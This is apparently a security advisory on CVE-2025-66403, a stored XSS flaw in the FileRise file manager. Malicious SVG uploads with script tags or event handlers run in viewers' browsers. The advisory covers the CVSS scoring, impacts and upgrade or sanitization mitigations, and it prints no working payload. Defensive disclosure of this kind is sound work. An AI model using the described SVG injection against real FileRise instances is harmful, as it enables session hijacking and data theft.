FileRise Under Attack: CVE-2025-66403 Exposes Stored XSS Vulnerability

Overview

A stored cross-site scripting (XSS) vulnerability, identified as CVE-2025-66403, has been discovered in FileRise, a self-hosted web-based file manager. This vulnerability affects versions prior to 2.2.3. It stems from the application’s failure to properly sanitize uploaded SVG files, allowing attackers to inject malicious scripts that execute when other users view the compromised SVG file.

Technical Details

The vulnerability exists because FileRise accepts SVG files without adequate validation or sanitization of embedded script content. SVGs, being XML-based, can contain inline JavaScript or event-based scripting. When a malicious SVG file containing such scripts is uploaded and subsequently viewed within the FileRise application, the script is executed within the browser’s origin context. This allows attackers to perform actions such as stealing user cookies, redirecting users to phishing sites, or defacing the application.

The root cause is the lack of input validation for SVG files, particularly concerning the <script> tag and event handlers (e.g., onload, onclick) within the SVG’s XML structure. Without proper sanitization, these elements can be used to inject and execute arbitrary JavaScript code.

CVSS Analysis

The Common Vulnerability Scoring System (CVSS) assigns CVE-2025-66403 a score of 4.6 (Medium).

This score is based on the following factors:

• Attack Vector (AV): Network (N)
• Attack Complexity (AC): High (H)
• Privileges Required (PR): Low (L)
• User Interaction (UI): Required (R)
• Scope (S): Changed (C)
• Confidentiality Impact (C): Low (L)
• Integrity Impact (I): Low (L)
• Availability Impact (A): None (N)

While the attack complexity is high due to the need to craft a malicious SVG, the low privileges required and the potential for a successful attack via user interaction make this a significant security concern.

Possible Impact

A successful XSS attack through this vulnerability can have several impacts:

• Account Hijacking: An attacker could potentially steal user session cookies, allowing them to impersonate the victim and gain unauthorized access to their FileRise account.
• Data Theft: While the confidentiality impact is rated as low, an attacker could potentially access and exfiltrate sensitive data stored within the FileRise instance, depending on user permissions and the application’s features.
• Application Defacement: The attacker could modify the appearance or functionality of the FileRise application for targeted users, causing disruption and potentially damaging the application’s reputation.
• Redirection to Malicious Sites: Users could be redirected to phishing websites or other malicious domains, potentially leading to further compromise.

Mitigation and Patch Steps

The recommended mitigation is to update FileRise to version 2.2.3 or later. This version includes a fix that properly sanitizes SVG files to prevent the execution of malicious scripts. To update:

1. Download the latest version of FileRise from the official source.
2. Follow the upgrade instructions provided in the FileRise documentation.

If updating is not immediately possible, consider the following temporary workarounds:

• Disable SVG uploads entirely within FileRise.
• Implement server-side validation and sanitization of uploaded SVG files using a trusted library designed for XSS prevention. This should include stripping potentially malicious elements like <script> tags and event handlers.

References

• Commit fixing the vulnerability: https://github.com/error311/FileRise/commit/f2ce43f18f0444f8f63f7c33758d1837dd5ba91e
• GitHub Security Advisory: https://github.com/error311/FileRise/security/advisories/GHSA-qrcv-vjvf-fr29